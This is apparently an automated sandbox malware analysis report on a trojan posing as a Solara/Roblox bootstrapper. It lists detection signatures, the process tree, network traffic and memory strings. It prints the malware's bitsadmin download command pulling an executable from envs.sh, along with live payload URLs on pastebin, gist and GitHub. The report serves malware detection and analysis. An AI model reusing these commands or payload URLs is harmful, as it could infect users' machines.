Windows Analysis Report
SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe

Overview

General Information

Sample name:SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
Analysis ID:1511791
MD5:7afabb528ce69e3a40dec6c3253ef854
SHA1:5161cc329e2fdda24218898bf637bb47a29daea2
SHA256:130b8c87664cf95a9fee611a0c14098a4da51f6b768260ad40a7d28ff895aaf0
Tags:exe
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Connects to a pastebin service (likely for C&C)
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Suspicious MSHTA Child Process
Sigma detected: Suspicious Process Parents
Tries to download files via bitsadmin
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file does not import any functions
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Searches for the Microsoft Outlook file path
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe (PID: 7144 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe" MD5: 7AFABB528CE69E3A40DEC6C3253EF854)
    • mshta.exe (PID: 6472 cmdline: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} MD5: 06B02D5C097C7DB1F109749C45F3F505)
      • bitsadmin.exe (PID: 3744 cmdline: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe MD5: F57A03FA0E654B393BB078D1C60695F3)
        • conhost.exe (PID: 3340 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • BootstrapperV1.19.exe (PID: 6516 cmdline: "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe" MD5: 90FD25CED85FE6DB28D21AE7D1F02E2C)
      • conhost.exe (PID: 5948 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WerFault.exe (PID: 7240 cmdline: C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184 MD5: FD27D9F6D02763BDE32511B5DF7FF7A0)
  • svchost.exe (PID: 2708 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
\Device\ConDrv | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |
Process Memory Space: BootstrapperV1.19.exe PID: 6516 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security |
2.0.BootstrapperV1.19.exe.226e67e0000.0.unpack | JoeSecurity_GenericDownloader_1 | Yara detected Generic Downloader | Joe Security |

          System Summary

          Source: Process started, Author: Michael Haag, Data: Command: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, CommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\bitsadmin.exe, NewProcessName: C:\Windows\SysWOW64\bitsadmin.exe, OriginalFileName: C:\Windows\SysWOW64\bitsadmin.exe, ParentCommandLine: "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} , ParentImage: C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6472, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, ProcessId: 3744, ProcessName: bitsadmin.exe
          Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe, ParentImage: C:\Windows\SysWOW64\bitsadmin.exe, ParentProcessId: 3744, ParentProcessName: bitsadmin.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3340, ProcessName: conhost.exe
          Source: Process started, Author: vburov, Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 2708, ProcessName: svchost.exe
          No Suricata rule has matched

          AV Detection

          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, Avira: detected
          Source: https://getsolara.dev/, Avira URL Cloud: Label: phishing
          Source: https://getsolara.dev/asset/discord.json, Avira URL Cloud: Label: phishing
          Source: http://getsolara.dev, Avira URL Cloud: Label: phishing
          Source: https://getsolara.dev, Avira URL Cloud: Label: phishing
          Source: https://getsolara.dev/api/endpoint.json, Avira URL Cloud: Label: phishing
          Source: https://getsolara.dev/Suspected, Avira URL Cloud: Label: phishing
          Source: https://getsolara.dev/X, Avira URL Cloud: Label: phishing
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, Avira: detection malicious, Label: TR/Redcap.oczed
          Source: getsolara.dev, Virustotal: Detection: 11%
          Source: https://getsolara.dev/, Virustotal: Detection: 12%
          Source: https://getsolara.dev/asset/discord.json, Virustotal: Detection: 9%
          Source: http://getsolara.dev, Virustotal: Detection: 11%
          Source: https://getsolara.dev, Virustotal: Detection: 12%
          Source: https://getsolara.dev/api/endpoint.json, Virustotal: Detection: 9%
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, ReversingLabs: Detection: 75%
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, ReversingLabs: Detection: 68%
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, Virustotal: Detection: 56%
          Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\Temp\BITD1EE.tmp, Joe Sandbox ML: detected
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, Joe Sandbox ML: detected
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: unknown, HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 89.163.145.170:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknown, HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

          Networking

          Source: unknown, DNS query: name: pastebin.com
          Source: Yara match, File source: 2.0.BootstrapperV1.19.exe.226e67e0000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe, type: DROPPED
          Source: global traffic, HTTP traffic detected: GET / HTTP/1.1 | Host: getsolara.dev | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /asset/discord.json HTTP/1.1 | Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/ | Host: getsolara.dev
          Source: global traffic, HTTP traffic detected: GET /raw/pjseRvyK HTTP/1.1 | Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/ | Host: pastebin.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /v2/client-version/WindowsPlayer/channel/live HTTP/1.1 | Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/ | Host: clientsettings.roblox.com | Connection: Keep-Alive
          Source: global traffic, HTTP traffic detected: GET /dist/v18.16.0/node-v18.16.0-x64.msi HTTP/1.1 | Cookie: __cf_mw_byp=P1xdg1aTseb9vNtr8wVwEo399A9Scp5jN8ifC15drlM-1726482144-0.0.1.1-/; path=/ | Host: www.nodejs.org | Connection: Keep-Alive
          Source: Joe Sandbox View, IP Address: 104.20.4.235
          Source: Joe Sandbox View, IP Address: 104.20.23.46
          Source: Joe Sandbox View, ASN Name: CLOUDFLARENETUS
          Source: Joe Sandbox View, ASN Name: MYLOC-ASIPBackboneofmyLocmanagedITAGDE
          Source: Joe Sandbox View, JA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
          Source: Joe Sandbox View, JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
          Source: unknown, UDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global traffic, HTTP traffic detected: GET /wUB.exe HTTP/1.1 | Connection: Keep-Alive | Accept: */* | Accept-Encoding: identity | If-Unmodified-Since: Sun, 15 Sep 2024 18:01:56 GMT | Range: bytes=0-1119 | User-Agent: Microsoft BITS/7.8 | Host: envs.sh
          Source: global traffic, DNS traffic detected: DNS query: getsolara.dev
          Source: global traffic, DNS traffic detected: DNS query: pastebin.com
          Source: global traffic, DNS traffic detected: DNS query: envs.sh
          Source: global traffic, DNS traffic detected: DNS query: clientsettings.roblox.com
          Source: global traffic, DNS traffic detected: DNS query: www.nodejs.org
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://getsolara.dev/Suspected
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268008B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://getsolara.dev/X
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://getsolara.dev/api/endpoint.json
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://getsolara.dev/asset/discord.json
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/raw
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://gist.githubusercontent.com/typeshi12/072784a0d3a602ed441a435d04c943b6/rawChttps://pastebin.c
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://gist.githubusercontent.com/typeshi12/29ef3a44a19235b08aaf229631c024d8/raw
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Bootstrapper.exe
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/typeshi12/end/releases/download/re/Solara.Dir.zip
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://github.com/zzzprojects/html-agility-pack/issues/513
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268014B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268018B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ncs.roblox.com/upload
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.000002268014B000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680187000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
          Source: svchost.exe, 00000006.00000003.1894883099.00000230B3212000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.6.dr, edb.log.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
          Source: edb.log.6.drString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226801B5000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/pjseRvyK
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800E2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800C9000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/5xx-error-landing
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800F2000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.00000226800CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.cloudflare.com/learning/access-management/phishing-attack/
          Source: BootstrapperV1.19.exe.0.drString found in binary or memory: https://www.newtonsoft.com/jsonschema
          Source: BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.nodejs.org
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe, 00000002.00000002.2123011599.0000022680200000.00000004.00000800.00020000.00000000.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://www.nodejs.org/dist/v18.16.0/node-v18.16.0-x64.msi
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.drString found in binary or memory: https://www.nuget.org/packages/Newtonsoft.Json.Bson
          Source: unknown HTTPS traffic detected: 104.21.93.27:443 -> 192.168.2.4:49731 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 104.20.4.235:443 -> 192.168.2.4:49737 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 89.163.145.170:443 -> 192.168.2.4:49738 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 128.116.119.3:443 -> 192.168.2.4:49739 version: TLS 1.2
          Source: unknown HTTPS traffic detected: 104.20.23.46:443 -> 192.168.2.4:49741 version: TLS 1.2
          Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe 97572BD57B08B59744E4DFE6F93FB96BE4002DFE1AA78683771725401776464F
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184
          Source: BITD1EE.tmp.6.dr Static PE information: No import functions for PE file found
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, 00000000.00000002.1876098928.000000001BBD2000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameMSHTA.EXE.MUID vs SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe, 00000000.00000002.1873391944.0000000001216000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenameSolaraBootstrapper.exeF vs SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Binary or memory string: OriginalFilenameSolara.exe4 vs SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe
          Source: C:\Windows\SysWOW64\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.dr Binary or memory string: .sln
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.dr Binary or memory string: .csproj.css
          Source: BootstrapperV1.19.exe, 00000002.00000000.1871044540.00000226E67E2000.00000002.00000001.01000000.00000007.sdmp, BootstrapperV1.19.exe.0.dr Binary or memory string: .vbproj.vbs
          Source: classification engine Classification label: mal100.troj.evad.winEXE@11/14@5/6
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe File created: C:\Users\user\AppData\Roaming\Downloader.hta
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Mutant created: NULL
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5948:120:WilError_03
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Mutant created: \Sessions\1\BaseNamedObjects\0k3GqkzQa4gYrITr6
          Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3340:120:WilError_03
          Source: C:\Windows\System32\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6516
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe File created: C:\Users\user\AppData\Local\Temp\node-v18.16.0-x64.msi
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe File read: C:\Users\user\Desktop\desktop.ini
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe ReversingLabs: Detection: 68%
          Source: SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Virustotal: Detection: 56%
          Source: unknown Process created: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe "C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe"
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Process created: C:\Windows\SysWOW64\mshta.exe "C:\Windows\SysWOW64\mshta.exe" "C:\Users\user\AppData\Roaming\Downloader.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Siggen21.26995.26259.1562.exe Process created: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe "C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe"
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\SysWOW64\mshta.exe Process created: C:\Windows\SysWOW64\bitsadmin.exe "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://envs.sh/wUB.exe C:\Users\user\AppData\Local\Temp\cheat.exe
          Source: C:\Windows\SysWOW64\bitsadmin.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exe Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6516 -s 2184
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Users\user\AppData\Roaming\BootstrapperV1.19.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\bitsadmin.exeSection loaded: bitsproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
